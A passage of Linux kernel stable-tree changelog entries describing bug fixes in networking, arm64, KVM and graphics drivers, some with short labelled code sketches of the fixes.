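A sketch of the setsockopt side (value validation trimmed; the matching
lock_sock() is also taken at the start of packet_set_ring()):

  case PACKET_VERSION:
          lock_sock(sk);
          if (po->rx_ring.pg_vec || po->tx_ring.pg_vec)
                  ret = -EBUSY;   /* ring already set up, too late */
          else
                  po->tp_version = val;
          release_sock(sk);
          return ret;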
Fixes: f6fb8f100b ("af-packet: TPACKET_V3 flexible buffer implementation.")
Signed-off-by: Philip Pettersson <philip.pettersson@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 648f0c28df ]
pskb_may_pull() can reallocate skb->head, we need to reload dh pointer
in dccp_invalid_packet() or risk use after free.
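The reload is essentially (a sketch; dccph_doff is the data offset read
from the header before the pull):

  if (!pskb_may_pull(skb, dccph_doff * sizeof(u32)))
          return 1;               /* data offset too large */
  dh = dccp_hdr(skb);             /* skb->head may have moved */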
Bug found by Andrey Konovalov using syzkaller.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a0b44eea37 ]
On macb only (not gem), when a RX queue corruption was detected from
macb_rx(), the RX queue was reset: during this process the RX ring
buffer descriptor was initialized by macb_init_rx_ring() but we forgot
to also set bp->rx_tail to 0.
Indeed, when processing the received frames, bp->rx_tail provides the
macb driver with the index in the RX ring buffer of the next buffer to
process. So when the whole ring buffer is reset we must also reset
bp->rx_tail so the driver is synchronized again with the hardware.
Since macb_init_rx_ring() is called from many locations, currently from
macb_rx() and macb_init_rings(), we'd rather add the "bp->rx_tail = 0;"
line inside macb_init_rx_ring() than add the very same line after each
call of this function.
Without this fix, the rx queue is not reset properly to recover from
queue corruption and connection drop may occur.
Signed-off-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Fixes: 9ba723b081 ("net: macb: remove BUG_ON() and reset the queue to handle RX errors")
Acked-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ed5d7788a9 ]
It is wrong to schedule a work from sk_destruct using the socket
as the memory reserve because the socket will be freed immediately
after the return from sk_destruct.
Instead we should do the deferral prior to sk_free.
This patch does just that.
Fixes: 707693c8a4 ("netlink: Call cb->done from a worker thread")
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 707693c8a4 ]
The cb->done interface expects to be called in process context.
This was broken by the netlink RCU conversion. This patch fixes
it by adding a worker struct to make the cb->done call where
necessary.
Fixes: 21e4902aea ("netlink: Lockless lookup with RCU grace...")
Reported-by: Subash Abhinov Kasiviswanathan <subashab@codeaurora.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 95c2027bfe ]
Add a validation function to make sure offset is valid:
1. Not below skb head (could happen when offset is negative).
2. Validate both 'offset' and 'at'.
Signed-off-by: Amir Vadai <amir@vadai.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7a99cd6e21 ]
_dsa_register_switch() gets a dsa_switch_tree object either via
dsa_get_dst() or via dsa_add_dst(). The former path does not increase the
kref of the returned object (so the caller does not own a reference),
while the latter path creates a new object (so the caller does own a
reference).
The rest of _dsa_register_switch() assumes that it owns a reference, and
calls dsa_put_dst().
This causes memory breakage if the first switch in the tree initialized
successfully but the second failed to initialize. In particular, the freed
dsa_switch_tree object is left referenced by the switch that was
initialized, and later access to the sysfs attributes of that switch
causes an OOPS.
To fix this, add a kref_get() call to dsa_get_dst().
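A sketch of the fixed lookup (the list head and field names are assumed to
match the description above):

  static struct dsa_switch_tree *dsa_get_dst(struct device_node *np)
  {
          struct dsa_switch_tree *dst;

          list_for_each_entry(dst, &dsa_switch_trees, list)
                  if (dst->np == np) {
                          kref_get(&dst->refcount);  /* caller now owns a reference */
                          return dst;
                  }
          return NULL;
  }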
Fixes: 83c0afaec7 ("net: dsa: Add new binding implementation")
Signed-off-by: Nikita Yushchenko <nikita.yoush@cogentembedded.com>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d936377414 ]
Roi reported a crash in flower where tp->root was NULL in ->classify()
callbacks. Reason is that in ->destroy() tp->root is set to NULL via
RCU_INIT_POINTER(). It's problematic for some of the classifiers, because
this doesn't respect RCU grace period for them, and as a result, still
outstanding readers from tc_classify() will try to blindly dereference
a NULL tp->root.
The tp->root object is strictly private to the classifier implementation
and holds internal data the core such as tc_ctl_tfilter() doesn't know
about. Within some classifiers, such as cls_bpf, cls_basic, etc, tp->root
is only checked for NULL in ->get() callback, but nowhere else. This is
misleading and seemed to be copied from old classifier code that was not
cleaned up properly. For example, d3fa76ee6b ("[NET_SCHED]: cls_basic:
fix NULL pointer dereference") moved tp->root initialization into ->init()
routine, where before it was part of ->change(), so ->get() had to deal
with tp->root being NULL back then, so that was indeed a valid case, after
d3fa76ee6b, not really anymore. We used to set tp->root to NULL long
ago in ->destroy(), see 47a1a1d4be ("pkt_sched: remove unnecessary xchg()
in packet classifiers"); but the NULLifying was reintroduced with the
RCUification, but it's not correct for every classifier implementation.
In the cases that are fixed here with one exception of cls_cgroup, tp->root
object is allocated and initialized inside ->init() callback, which is always
performed at a point in time after we allocate a new tp, which means tp and
thus tp->root was not globally visible in the tp chain yet (see tc_ctl_tfilter()).
Also, on destruction tp->root is strictly kfree_rcu()'ed in ->destroy()
handler, same for the tp which is kfree_rcu()'ed right when we return
from ->destroy() in tcf_destroy(). This means, the head object's lifetime
for such classifiers is always tied to the tp lifetime. The RCU callback
invocation for the two kfree_rcu() could be out of order, but that's fine
since both are independent.
Dropping the RCU_INIT_POINTER(tp->root, NULL) for these classifiers here
means that 1) we don't need a useless NULL check in fast-path and, 2) that
outstanding readers of that tp in tc_classify() can still execute under
respect with RCU grace period as it is actually expected.
Things that haven't been touched here: cls_fw and cls_route. They each
handle tp->root being NULL in ->classify() path for historic reasons, so
their ->destroy() implementation can stay as is. If someone actually
cares, they could get cleaned up at some point to avoid the test in fast
path. cls_u32 doesn't set tp->root to NULL. For cls_rsvp, I just added a
!head check should anyone actually be using/testing it, so it at least aligns with
cls_fw and cls_route. For cls_flower we additionally need to defer rhashtable
destruction (to a sleepable context) after RCU grace period as concurrent
readers might still access it. (Note that in this case we need to hold module
reference to keep work callback address intact, since we only wait on module
unload for all call_rcu()s to finish.)
This fixes one race to bring RCU grace period guarantees back. Next step
as worked on by Cong however is to fix 1e052be69d ("net_sched: destroy
proto tp when all filters are gone") to get the order of unlinking the tp
in tc_ctl_tfilter() for the RTM_DELTFILTER case right by moving
RCU_INIT_POINTER() before tcf_destroy() and let the notification for
removal be done through the prior ->delete() callback. Both are independent
issues. Once we have that right, we can then clean tp->root up for a number
of classifiers by not making them RCU pointers, which requires a new callback
(->uninit) that is triggered from tp's RCU callback, where we just kfree()
tp->root from there.
Fixes: 1f947bf151 ("net: sched: rcu'ify cls_bpf")
Fixes: 9888faefe1 ("net: sched: cls_basic use RCU")
Fixes: 70da9f0bf9 ("net: sched: cls_flow use RCU")
Fixes: 77b9900ef5 ("tc: introduce Flower classifier")
Fixes: bf3994d2ed ("net/sched: introduce Match-all classifier")
Fixes: 952313bd62 ("net: sched: cls_cgroup use RCU")
Reported-by: Roi Dayan <roid@mellanox.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Cc: John Fastabend <john.fastabend@gmail.com>
Cc: Roi Dayan <roid@mellanox.com>
Cc: Jiri Pirko <jiri@mellanox.com>
Acked-by: John Fastabend <john.r.fastabend@intel.com>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 76da8706d9 ]
In case the link changes and EEE is enabled or disabled, always try to
re-negotiate this with the link partner.
Fixes: 450b05c15f ("net: dsa: bcm_sf2: add support for controlling EEE")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 30c7be26fd ]
In commits 93821778de ("udp: Fix rcv socket locking") and
f7ad74fef3 ("net/ipv6/udp: UDP encapsulation: break backlog_rcv into
__udpv6_queue_rcv_skb") UDP backlog handlers were renamed, but UDPlite
was forgotten.
This leads to crashes if the UDPlite header is pulled twice, which happens
starting from commit e6afc8ace6 ("udp: remove headers from UDP packets
before queueing")
Bug found by the syzkaller team, thanks a lot guys!
Note that backlog use in UDP/UDPlite is scheduled to be removed starting
from linux-4.10, so this patch is only needed up to linux-4.9
Fixes: 93821778de ("udp: Fix rcv socket locking")
Fixes: f7ad74fef3 ("net/ipv6/udp: UDP encapsulation: break backlog_rcv into __udpv6_queue_rcv_skb")
Fixes: e6afc8ace6 ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Benjamin LaHaise <bcrl@kvack.org>
Cc: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 764d3be6e4 ]
When an ipv6 address has the tentative flag set, it can't be
used as source for egress traffic, while the associated route,
if any, can be looked up and even stored into some dst_cache.
In the latter scenario, the source ipv6 address selected and
stored in the cache is most probably wrong (e.g. with
link-local scope) and the entity using the dst_cache will
experience lack of ipv6 connectivity until said cache is
cleared or invalidated.
Overall this may cause lack of connectivity over most IPv6 tunnels
(comprising geneve and vxlan), if the first egress packet reaches
the tunnel before the DaD is completed for the used ipv6
address.
This patch bumps a new genid after the IFA_F_TENTATIVE flag
is cleared, so that dst_cache will be invalidated on
next lookup and ipv6 connectivity restored.
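A minimal sketch of the idea (exact placement and variable names assumed), at
the point where DaD completes:
  /* address is now usable as a source: force cached dsts to be re-validated */
  ifp->flags &= ~IFA_F_TENTATIVE;
  rt_genid_bump_ipv6(dev_net(ifp->idev->dev));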
Fixes: 0c1d70af92 ("net: use dst_cache for vxlan device")
Fixes: 468dfffcd7 ("geneve: add dst caching support")
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 06a77b07e3 ]
Commit 2b15af6f95 ("af_unix: use freezable blocking calls in read")
converts schedule_timeout() to its freezable version, it was probably
correct at that time, but later, commit 2b514574f7
("net: af_unix: implement splice for stream af_unix sockets") breaks
the strong requirement for a freezable sleep, according to
commit 0f9548ca10:
We shouldn't try_to_freeze if locks are held. Holding a lock can cause a
deadlock if the lock is later acquired in the suspend or hibernate path
(e.g. by dpm). Holding a lock can also cause a deadlock in the case of
cgroup_freezer if a lock is held inside a frozen cgroup that is later
acquired by a process outside that group.
The pipe_lock is still held at that point.
So use freezable version only for the recvmsg call path, avoid impact for
Android.
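Sketched, the wait helper grows a flag so that only the recvmsg path (which
holds no pipe_lock) uses the freezable primitive; the parameter name is assumed:
  /* inside unix_stream_data_wait(), simplified */
  if (freezable)
          timeo = freezable_schedule_timeout(timeo);  /* recvmsg path */
  else
          timeo = schedule_timeout(timeo);            /* splice path, pipe_lock held */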
Fixes: 2b514574f7 ("net: af_unix: implement splice for stream af_unix sockets")
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Tejun Heo <tj@kernel.org>
Cc: Colin Cross <ccross@android.com>
Cc: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Cc: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 06ba3b2133 ]
The sky2 driver frequently crashes during machine shutdown with:
sky2_get_stats+0x60/0x3d8 [sky2]
dev_get_stats+0x68/0xd8
rtnl_fill_stats+0x54/0x140
rtnl_fill_ifinfo+0x46c/0xc68
rtmsg_ifinfo_build_skb+0x7c/0xf0
rtmsg_ifinfo.part.22+0x3c/0x70
rtmsg_ifinfo+0x50/0x5c
netdev_state_change+0x4c/0x58
linkwatch_do_dev+0x50/0x88
__linkwatch_run_queue+0x104/0x1a4
linkwatch_event+0x30/0x3c
process_one_work+0x140/0x3e0
worker_thread+0x60/0x44c
kthread+0xdc/0xf0
ret_from_fork+0x10/0x50
This is caused by the sky2 driver being called after it has been shut down.
A previous thread about this can be found here:
https://lkml.org/lkml/2016/4/12/410
An alternative fix is to assure that IFF_UP gets cleared by
calling dev_close() during shutdown. This is similar to what the
bnx2/tg3/xgene and maybe others are doing to assure that the driver
isn't being called following _shutdown().
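A sketch of that approach for sky2 (simplified; the rest of the existing
shutdown work would follow):
  static void sky2_shutdown(struct pci_dev *pdev)
  {
          struct sky2_hw *hw = pci_get_drvdata(pdev);
          int port;

          rtnl_lock();                    /* dev_close() requires RTNL */
          for (port = 0; port < hw->ports; port++)
                  dev_close(hw->dev[port]);
          rtnl_unlock();
  }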
Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit cfc44a4d14 ]
Andrei reports we still allocate netns ID from idr after we destroy
it in cleanup_net().
cleanup_net():
...
idr_destroy(&net->netns_ids);
...
list_for_each_entry_reverse(ops, &pernet_list, list)
ops_exit_list(ops, &net_exit_list);
-> rollback_registered_many()
-> rtmsg_ifinfo_build_skb()
-> rtnl_fill_ifinfo()
-> peernet2id_alloc()
After that point we should not even access net->netns_ids, we
should check the death of the current netns as early as we can in
peernet2id_alloc().
For net-next we can consider avoiding sending the rtmsg entirely,
it is a good optimization for netns teardown path.
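One way to express the early check (sketch; the exact liveness test is an
assumption):
  /* at the top of peernet2id_alloc(), before touching net->netns_ids */
  if (atomic_read(&net->count) == 0)
          return NETNSA_NSID_NOT_ASSIGNED;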
Fixes: 0c7aecd4bd ("netns: add rtnl cmd to add and get peer netns ids")
Reported-by: Andrei Vagin <avagin@gmail.com>
Cc: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e47112d9d6 ]
We currently have a fundamental problem in how we treat the CPU port and
its VLAN membership. As soon as a second VLAN is configured to be
untagged, the CPU automatically becomes untagged for that VLAN as well,
and yet, we don't gracefully make sure that the CPU becomes tagged in
the other VLANs it could be a member of. This results in only one VLAN
being effectively usable from the CPU's perspective.
Instead of having some pretty complex logic which tries to maintain the
CPU port's default VLAN and its untagged properties, just do something
very simple which consists in neither altering the CPU port's PVID
settings, nor its untagged settings:
- whenever a VLAN is added, the CPU is automatically a member of this
VLAN group, as a tagged member
- PVID settings for downstream ports do not alter the CPU port's PVID
since it now is part of all VLANs in the system
This means that a typical example where e.g. LAN ports are in VLAN1 and the
WAN port is in VLAN2 now requires having two VLAN interfaces for the
host to properly terminate and send traffic from/to.
Fixes: a2482d2ce3 ("net: dsa: b53: Plug in VLAN support")
Reported-by: Hartmut Knaack <knaack.h@gmx.de>
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 963abe5c8a ]
It seems many drivers do not respect napi_hash_del() contract.
When napi_hash_del() is used before netif_napi_del(), an RCU grace
period is needed before freeing NAPI object.
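The pattern the contract requires looks roughly like this (receive-queue field
names assumed):
  /* napi_hash_del() returns true if RCU readers may still see the entry */
  if (napi_hash_del(&vi->rq[i].napi))
          synchronize_net();              /* wait out the grace period */
  netif_napi_del(&vi->rq[i].napi);
  /* only now is it safe to free the structure embedding the NAPI */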
Fixes: 91815639d8 ("virtio-net: rx busy polling support")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jason Wang <jasowang@redhat.com>
Cc: Michael S. Tsirkin <mst@redhat.com>
Acked-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e88a276614 ]
Rolf Neugebauer reported very long delays at netns dismantle.
Eric W. Biederman was kind enough to look at this problem
and noticed synchronize_net() occurring from netif_napi_del() that was
added in linux-4.5
Busy polling makes no sense for tunnels NAPI.
If busy poll is used for sessions over tunnels, the poller will need to
poll the physical device queue anyway.
netif_tx_napi_add() could be used here, but the function name is misleading,
and renaming it is not stable material, so set NAPI_STATE_NO_BUSY_POLL
bit directly.
This will avoid inserting gro_cells napi structures in napi_hash[]
and avoid the problematic synchronize_net() (per possible cpu) that
Rolf reported.
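Sketched, in gro_cells_init() (ordering per this changelog; hedged):
  /* opt out of busy polling before registration so the NAPI never
   * enters napi_hash[] and never needs synchronize_net() on removal */
  set_bit(NAPI_STATE_NO_BUSY_POLL, &cell->napi.state);
  netif_napi_add(dev, &cell->napi, gro_cell_poll, NAPI_POLL_WEIGHT);
  napi_enable(&cell->napi);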
Fixes: 93d05d4a32 ("net: provide generic busy polling to all NAPI drivers")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Rolf Neugebauer <rolf.neugebauer@docker.com>
Reported-by: Eric W. Biederman <ebiederm@xmission.com>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Rolf Neugebauer <rolf.neugebauer@docker.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d08544127d upstream.
The suspend/resume path in kernel/sleep.S, as used by cpu-idle, does not
save/restore PSTATE. As a result of this cpufeatures that were detected
and have bits in PSTATE get lost when we resume from idle.
UAO gets set appropriately on the next context switch. PAN will be
re-enabled next time we return from user-space, but on a preemptible
kernel we may run work accessing user space before this point.
Add code to re-enable these two features in __cpu_suspend_exit().
We re-use uao_thread_switch() passing current.
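A hedged sketch of the shape of that code (the exact capability checks in the
real tree differ):
  void notrace __cpu_suspend_exit(void)
  {
          /* ... existing resume work ... */

          /* UAO state is per-thread and lives in PSTATE: replay it */
          uao_thread_switch(current);

          /* PAN is simply re-asserted when the feature is configured */
          if (IS_ENABLED(CONFIG_ARM64_PAN))
                  asm(SET_PSTATE_PAN(1));
  }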
Signed-off-by: James Morse <james.morse@arm.com>
Cc: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7209c86860 upstream.
Commit 338d4f49d6 ("arm64: kernel: Add support for Privileged Access
Never") enabled PAN by enabling the 'SPAN' feature-bit in SCTLR_EL1.
This means the PSTATE.PAN bit won't be set until the next return to the
kernel from userspace. On a preemptible kernel we may schedule work that
accesses userspace on a CPU before it has done this.
Now that cpufeature enable() calls are scheduled via stop_machine(), we
can set PSTATE.PAN from the cpu_enable_pan() call.
Add WARN_ON_ONCE(in_interrupt()) to check the PSTATE value we updated
is not immediately discarded.
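Roughly, once enable() runs via stop_machine() (prototype as changed by that
series; the SCTLR handling shown here is a simplified assumption):
  static int cpu_enable_pan(void *__unused)
  {
          /* must run in process context, not from an IPI, or the PSTATE
           * update would be thrown away on return from the interrupt */
          WARN_ON_ONCE(in_interrupt());

          config_sctlr_el1(SCTLR_EL1_SPAN, 0);
          asm(SET_PSTATE_PAN(1));
          return 0;
  }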
Reported-by: Tony Thompson <anthony.thompson@arm.com>
Reported-by: Vladimir Murzin <vladimir.murzin@arm.com>
Signed-off-by: James Morse <james.morse@arm.com>
[will: fixed typo in comment]
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2a6dcb2b5f upstream.
The enable() call for a cpufeature/errata is called using on_each_cpu().
This issues a cross-call IPI to get the work done. Implicitly, this
stashes the running PSTATE in SPSR when the CPU receives the IPI, and
restores it when we return. This means an enable() call can never modify
PSTATE.
To allow PAN to do this, change the on_each_cpu() call to use
stop_machine(). This schedules the work on each CPU which allows
us to modify PSTATE.
This involves changing the prototype of all the enable() functions.
enable_cpu_capabilities() is called during boot and enables the feature
on all online CPUs. This path now uses stop_machine(). CPU features for
hotplug'd CPUs are enabled by verify_local_cpu_features() which only
acts on the local CPU, and can already modify the running PSTATE as it
is called from secondary_start_kernel().
Reported-by: Tony Thompson <anthony.thompson@arm.com>
Reported-by: Vladimir Murzin <vladimir.murzin@arm.com>
Signed-off-by: James Morse <james.morse@arm.com>
Cc: Suzuki K Poulose <suzuki.poulose@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
[Removed enable() hunks for A53 workaround]
Signed-off-by: James Morse <james.morse@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e13258f38e upstream.
The throughput meter detects different situations as problems for the
current test. It stops the test after these and reports it to userspace.
This also has to be done when the primary interface disappeared during the
test.
Fixes: 33a3bb4a33 ("batman-adv: throughput meter implementation")
Reported-by: Joe Perches <joe@perches.com>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ac95330b96 upstream.
commit cfa6368860 ("clk: sunxi: factors: Consolidate get_factors
parameters into a struct") introduced a regression for m factor
computation in sun4i_get_apb1_factors function.
The old code reassigned the "parent_rate" parameter to the targeted
divisor value and was buggy for the returned frequency but not for the
computed factors. Now, the returned frequency is good but the m factor is
incorrectly computed (its max value of 31 is always set, resulting in a
significantly slower frequency than the requested one...).
This patch simply restores the original proper computation for m while
keeping the good changes for returned rate.
Fixes: cfa6368860 ("clk: sunxi: factors: Consolidate get_factors parameters into a struct")
Signed-off-by: Stéphan Rafin <stephan@soliotek.com>
Signed-off-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5ad45307d9 upstream.
The probe function requests the interrupt before initializing
the ddp component, which leads to a null pointer dereference at boot.
Fix this by requesting the interrupt after all components have been
initialized properly.
Fixes: 119f517362 ("drm/mediatek: Add DRM Driver for Mediatek SoC MT8173.")
Signed-off-by: Matthias Brugger <matthias.bgg@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0e1614ac84 upstream.
Make sure to drop the reference to the parent device taken by
class_find_device() after "unexporting" any children when deregistering
a PWM chip.
Fixes: 0733424c9b ("pwm: Unexport children before chip removal")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Thierry Reding <thierry.reding@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0f1d21c1c upstream.
We should move the ops->destroy(dev) after the list_del(&dev->vm_node)
so that we don't use "dev" after freeing it.
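A sketch of the corrected ordering (the surrounding error path is assumed):
  mutex_lock(&kvm->lock);
  list_del(&dev->vm_node);
  mutex_unlock(&kvm->lock);
  ops->destroy(dev);      /* may free dev, so it must come after list_del() */
  return ret;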
Fixes: a28ebea2ad ("KVM: Protect device ops->create and list_add with kvm->lock")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: David Hildenbrand <david@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 909e481e24 upstream.
The core and the cluster sleep state entry latencies can't be same as
cluster sleep involves more work compared to core level e.g. shared
cache maintenance.
Experiments have shown on an average about 100us more latency for the
cluster sleep state compared to the core level sleep. This patch fixes
the entry latency for the cluster sleep state.
Fixes: 28e10a8f3a ("arm64: dts: juno: Add idle-states to device tree")
Cc: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Cc: "Jon Medhurst (Tixy)" <tixy@linaro.org>
Reviewed-by: Liviu Dudau <Liviu.Dudau@arm.com>
Signed-off-by: Sudeep Holla <sudeep.holla@arm.com>
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bcfdd5d510 upstream.
The ATPX method does not always exist on the dGPU, it may be located at
the iGPU. The parent device of the iGPU is the root port for which
bridge_d3 is false. This accidentally enables the legacy PM method which
conflicts with port PM and prevented the dGPU from powering on.
Ported from amdgpu commit:
drm/amdgpu: fix check for port PM availability
from Peter Wu.
Fixes: d3ac31f3b4 (drm/radeon: fix power state when port pm is unavailable (v2))
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Cc: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7ac33e47d5 upstream.
The ATPX method does not always exist on the dGPU, it may be located at
the iGPU. The parent device of the iGPU is the root port for which
bridge_d3 is false. This accidentally enables the legacy PM method which
conflicts with port PM and prevented the dGPU from powering on.
Fixes: 1db4496f16 ("drm/amdgpu: fix power state when port pm is unavailable")
Reported-and-tested-by: Mike Lothian <mike@fireburn.co.uk>
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d3ac31f3b4 upstream.
When PCIe port PM is not enabled (system BIOS is pre-2015 or the
pcie_port_pm=off parameter is set), legacy ATPX PM should still be
marked as supported. Otherwise the GPU can fail to power on after
runtime suspend. This affected a Dell Inspiron 5548.
Ideally the BIOS date in the PCI core is lowered to 2013 (the first year
in which hybrid graphics platforms using power resources were introduced),
but that seems more risky at this point and would not solve the
pcie_port_pm=off issue.
v2: agd: fix typo
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98505
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1db4496f16 upstream.
When PCIe port PM is not enabled (system BIOS is pre-2015 or the
pcie_port_pm=off parameter is set), legacy ATPX PM should still be
marked as supported. Otherwise the GPU can fail to power on after
runtime suspend. This affected a Dell Inspiron 5548.
Ideally the BIOS date in the PCI core is lowered to 2013 (the first year
in which hybrid graphics platforms using power resources were introduced),
but that seems more risky at this point and would not solve the
pcie_port_pm=off issue.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98505
Reported-and-tested-by: Nayan Deshmukh <nayan26deshmukh@gmail.com>
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Acked-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8ca18eec2b upstream.
When we inject a level-triggered interrupt (and unless it
is backed by the physical distributor - timer style), we request
a maintenance interrupt. Part of the processing for that interrupt
is to feed to the rest of KVM (and to the eventfd subsystem) the
information that the interrupt has been EOIed.
But that notification only makes sense for SPIs, and not PPIs
(such as the PMU interrupt). Skip over the notification if
the interrupt is not an SPI.
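The check looks roughly like this in the maintenance/EOI handling (hedged
sketch):
  /* only SPIs have a route to the rest of KVM / the eventfd subsystem */
  if (vgic_valid_spi(vcpu->kvm, intid))
          kvm_notify_acked_irq(vcpu->kvm, 0,
                               intid - VGIC_NR_PRIVATE_IRQS);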
Fixes: 140b086dd1 ("KVM: arm/arm64: vgic-new: Add GICv2 world switch backend")
Fixes: 59529f69f5 ("KVM: arm/arm64: vgic-new: Add GICv3 world switch backend")
Reported-by: Catalin Marinas <catalin.marinas@arm.com>
Tested-by: Catalin Marinas <catalin.marinas@arm.com>
Acked-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fcd2042e8d upstream.
SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.
This can be easily noticed by connecting to a network with a 32-octet
SSID:
[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
'0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
xx:xx:xx:xx:xx:xx
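A hedged sketch of the capped print (field names assumed):
  mwifiex_dbg(adapter, INFO,
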